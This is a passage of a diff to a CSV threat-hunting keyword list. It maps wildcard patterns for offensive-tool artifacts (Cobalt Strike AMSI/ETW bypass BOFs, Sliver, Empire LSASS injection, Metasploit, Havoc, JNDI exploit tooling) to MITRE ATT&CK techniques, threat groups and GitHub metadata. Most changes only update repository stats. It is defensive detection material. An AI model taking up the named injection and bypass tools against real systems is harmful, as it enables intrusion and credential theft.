- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*inject-amsiBypass *","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" -"*inject-amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*inject-amsiBypass.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-amsiBypass *","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*inject-amsiBypass.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*inject-assembly *","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*inject-assembly.cna*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*injectassembly.x64.bin*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*injectassembly.x64.o*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" -"*Inject-BypassStuff*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*InjectDll.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*InjectDll.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*injected into LSASS*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inject-BypassStuff*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*InjectDll.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*InjectDll.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*injected into LSASS*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectedCredentials.csv*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*injectEtwBypass*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" -"*inject-etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*inject-etw-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*injectify*","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on 
websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","7","650","122","2022-07-20T15:02:37Z","2017-11-06T17:01:50Z" -"*Injection* -ProcName lsass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Injection\Spawn32*","offensive_tool_keyword","havoc","Havoc is a modern and malleable 
post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Injection\Spawn64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*Injection-Exploit-1.0-SNAPSHOT-all.jar*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. 
you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" -"*Injections/Traversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*Injections/XSS.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*Inject-LocalShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for 